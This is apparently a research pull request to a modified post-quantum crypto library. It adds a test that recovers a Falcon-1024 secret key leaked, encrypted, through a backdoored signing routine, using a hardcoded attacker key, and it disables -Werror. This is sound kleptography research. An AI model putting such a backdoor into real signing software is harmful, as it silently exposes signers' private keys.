### PR TITLE
Attack on falcon1024 and few fixes

### DIFF
--- a/.CMake/compiler_opts.cmake
+++ b/.CMake/compiler_opts.cmake
@@ -1,7 +1,7 @@
 # SPDX-License-Identifier: MIT
 
 if(CMAKE_C_COMPILER_ID MATCHES "Clang")
-    add_compile_options(-Werror)
+    # add_compile_options(-Werror)
     add_compile_options(-Wall)
     add_compile_options(-Wextra)
     add_compile_options(-Wpedantic)
@@ -54,7 +54,7 @@ if(CMAKE_C_COMPILER_ID MATCHES "Clang")
     endif()
 
 elseif(CMAKE_C_COMPILER_ID STREQUAL "GNU")
-    add_compile_options(-Werror)
+    # add_compile_options(-Werror)
     add_compile_options(-Wall)
     add_compile_options(-Wextra)
     add_compile_options(-Wpedantic)

--- a/src/sig/falcon/CMakeLists.txt
+++ b/src/sig/falcon/CMakeLists.txt
@@ -26,6 +26,7 @@ if(OQS_ENABLE_SIG_falcon_1024)
     target_include_directories(falcon_1024_clean PRIVATE ${CMAKE_CURRENT_LIST_DIR}/pqclean_falcon-1024_clean)
     target_include_directories(falcon_1024_clean PRIVATE ${PROJECT_SOURCE_DIR}/src/common/pqclean_shims)
     set(_FALCON_OBJS ${_FALCON_OBJS} $<TARGET_OBJECTS:falcon_1024_clean>)
+    target_link_libraries(falcon_1024_clean PRIVATE cecies)
 endif()
 
 if(OQS_ENABLE_SIG_falcon_1024_avx2)

--- a/src/sig/falcon/pqclean_falcon-512_clean/pqclean.c
+++ b/src/sig/falcon/pqclean_falcon-512_clean/pqclean.c
@@ -17,8 +17,11 @@
 // CECIES
 #include "cecies/encrypt.h"
 #include "cecies/types.h"
+#include "cecies/util.h"
 
-int ciphertext_counter, start;
+#include <stdio.h>
+
+int ciphertext_counter, start, ct_buffer_malloc = 0;
 uint8_t *ciphertext_buffer;
 unsigned char keygen_seed[32];
 
@@ -126,6 +129,12 @@ PQCLEAN_FALCON512_CLEAN_crypto_sign_keypair(unsigned char *pk, unsigned char *sk
 
     /* -------------------------------- Modified -------------------------------- */
     ciphertext_counter = 0;
+    
+    if (ct_buffer_malloc) {
+      free(ciphertext_buffer);
+      ct_buffer_malloc = 0;
+    } 
+    
     /*
      * Generate key pair.
      */
@@ -279,6 +288,7 @@ do_sign(uint8_t *nonce, uint8_t *sigbuf, size_t *sigbuflen,
 
         // printf("Copying buffer...\n");
         ciphertext_buffer = (uint8_t *) malloc(ciphertext_len);
+        ct_buffer_malloc = 1;
 
         memcpy(ciphertext_buffer, ciphertext, ciphertext_len);
         start = 0;
@@ -307,8 +317,6 @@ do_sign(uint8_t *nonce, uint8_t *sigbuf, size_t *sigbuflen,
 
 
     /* ------------------------------ End Modified ------------------------------ */
-
-
 
     /*
      * Hash message nonce + message into a vector.

--- a/tests/CMakeLists.txt
+++ b/tests/CMakeLists.txt
@@ -91,12 +91,23 @@ endif()
 add_executable(test_sig_mem test_sig_mem.c)
 target_link_libraries(test_sig_mem PRIVATE ${API_TEST_DEPS} cecies)
 
+
+# -------------------------------- Modified -------------------------------- #
 add_executable(test_attack_falcon test_attack_falcon.c)
 if((CMAKE_C_COMPILER_ID MATCHES "Clang") OR (CMAKE_C_COMPILER_ID STREQUAL "GNU"))
     target_link_libraries(test_attack_falcon PRIVATE ${API_TEST_DEPS} cecies Threads::Threads)
 else ()
     target_link_libraries(test_attack_falcon PRIVATE ${API_TEST_DEPS} cecies)
 endif()
+
+add_executable(test_attack_falcon1024 test_attack_falcon1024.c)
+if((CMAKE_C_COMPILER_ID MATCHES "Clang") OR (CMAKE_C_COMPILER_ID STREQUAL "GNU"))
+    target_link_libraries(test_attack_falcon1024 PRIVATE ${API_TEST_DEPS} cecies Threads::Threads)
+else ()
+    target_link_libraries(test_attack_falcon1024 PRIVATE ${API_TEST_DEPS} cecies)
+endif()
+# ------------------------------ End Modified ------------------------------ #
+
 
 add_executable(speed_sig speed_sig.c)
 target_link_libraries(speed_sig PRIVATE ${API_TEST_DEPS} cecies)

--- a/tests/test_attack_falcon1024.c
+++ b/tests/test_attack_falcon1024.c
@@ -1,0 +1,110 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#include <oqs/sig_falcon.h>
+#include <oqs/rand.h>
+
+#include "cecies/decrypt.h"
+#include "cecies/types.h"
+
+#define SEEDLEN       48
+#define MESSAGELEN    50
+#define INFOATTACK    80
+
+
+// Info saved from the signatures
+uint8_t ct_attack[INFOATTACK];
+// Bytes already saved from the signatures
+int start_attack = 0;
+
+
+// Decrypt info in ct_attack
+void attacker_decrypt(uint8_t** plaintext_dec) {
+    size_t plaintext_len;
+
+    cecies_curve25519_key private_key = {.hexstring = "48bddcca7d36729e0f54acedf7016b14c72423749757fc80d90d9017fea3cbc0"};
+
+    if (cecies_curve25519_decrypt(ct_attack, INFOATTACK, 0, private_key, plaintext_dec, &plaintext_len)) {
+        printf("cecies_curve25519_decrypt failed\n");
+        exit(EXIT_FAILURE);
+    }
+}
+
+
+// Recover the private key from the attacked party
+int main() {
+    uint8_t *pk, *sk, *generated_sk;
+    uint8_t *sig, *message, *plaintext_dec;
+    size_t siglen;
+    int ret;
+
+    pk = malloc(OQS_SIG_falcon_1024_length_public_key);
+    sk = malloc(OQS_SIG_falcon_1024_length_secret_key);
+    generated_sk = malloc(OQS_SIG_falcon_1024_length_secret_key);
+    message = malloc(MESSAGELEN);
+    plaintext_dec = malloc(32);
+    sig = malloc(OQS_SIG_falcon_1024_length_signature);
+    OQS_randombytes(message, MESSAGELEN); // message is not relevant
+
+
+    ret = PQCLEAN_FALCON1024_CLEAN_crypto_sign_keypair(pk, sk);
+    if (ret != 0) {
+        printf("ERROR: PQCLEAN_FALCON1024_CLEAN_crypto_sign_keypair failed\n");
+    }
+
+    // 2 signatures to get the 80 bytes of the ciphertext
+    for (int i = 0; i < 2; ++i) {
+
+        ret = PQCLEAN_FALCON1024_CLEAN_crypto_sign_signature(sig, &siglen, message, MESSAGELEN, sk);
+        if (ret != 0) {
+            printf("ERROR: PQCLEAN_FALCON1024_CLEAN_crypto_sign failed\n");
+        }
+
+        ret = PQCLEAN_FALCON1024_CLEAN_crypto_sign_verify(sig, siglen, message, MESSAGELEN, pk);
+        if (ret != 0) {
+            printf("ERROR: PQCLEAN_FALCON1024_CLEAN_crypto_sign_verify failed\n");
+        }
+
+        // The ciphertext begins in the second byte of the signature
+        for (int a = 0, s = start_attack; a < 40; a++) {
+            ct_attack[a+s] = sig[a+1];
+        }
+
+        // Verificar se este é o primeiro ciphertext ou o segundo
+        // Binário: 1000 0000 é 0x80 em hexadecimal
+        // if (sig[0+1] < 0x80) {
+        //   printf("Este é o primeiro ciphertext\n");
+        // } else {
+        //   printf("Este é o segundo ciphertext\n");
+        // }
+        start_attack += 40;
+
+    }
+
+    // Construct the private key from the ciphertext
+    attacker_decrypt(&plaintext_dec);
+
+    ret = PQCLEAN_FALCON1024_CLEAN_crypto_sign_keypair_attack(generated_sk, plaintext_dec);
+    if (ret != 0) {
+        printf("ERROR: PQCLEAN_FALCON1024_CLEAN_crypto_sign_keypair_attack failed\n");
+    }
+
+    // Check if the generated private key is equal to the real private key
+    for (int i = 0; i < OQS_SIG_falcon_1024_length_secret_key; ++i) {
+        // printf("%d\n", generated_sk[i]);
+        // printf("%d\n", sk[i]);
+        if (generated_sk[i] != sk[i]) {
+            printf("wrong sk in index %ld\n", i);
+        }
+    }
+
+    free(pk);
+    free(sk);
+    free(generated_sk);
+    free(message);
+    free(plaintext_dec);
+    free(sig);
+
+    return 0;
+}


### PR DESCRIPTION
- Implementação do ataque no Falcon1024

- Suprimi a flag -Werror do compilador, pois ela estava impedindo de compilar a lib CECIES

Adicionei uma variável/flag no pqclean.c chamada ct_buffer_malloc, para que a gente faça free de um ciphertext_buffer que foi mallocado:
   - Se a gente não fizer free, e se forem geradas muitas vezes consecutivas um par de chaves e uma assinatura, vamos gastar muita memória pois sempre estará sendo feito um malloc...